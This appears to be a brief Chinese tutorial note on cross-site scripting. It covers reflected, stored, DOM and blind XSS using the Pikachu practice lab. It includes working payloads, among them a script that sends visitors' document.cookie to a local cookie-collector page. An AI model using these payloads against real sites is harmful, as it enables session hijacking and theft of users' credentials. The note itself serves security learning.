介绍
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问
Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。
XSS分类一般如下:
1.反射型XSS
2.存储型XSS
3.DOM型XSS
1.反射型XSS,非持久性XSS
alert(document.cookie) //弹出当前cookie
2.存储型XSS,持久性XSS,JS代码会存在后台
3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法
'"><img onerror=alert(0) src=><"'
利用XSS进行攻击:
攻击方:
找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php
编辑攻击代码:
<script>
document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>
用户访问留言板,攻击方就收集到用户的cookie 了
4.XSS盲打
攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。
输入的内容不会在前端输出,而是提交到了后台。
管理员登录后台管理界面,可能遭受到XSS攻击。
5.XSS过滤
<script>
alert(document.cookie)
</script>
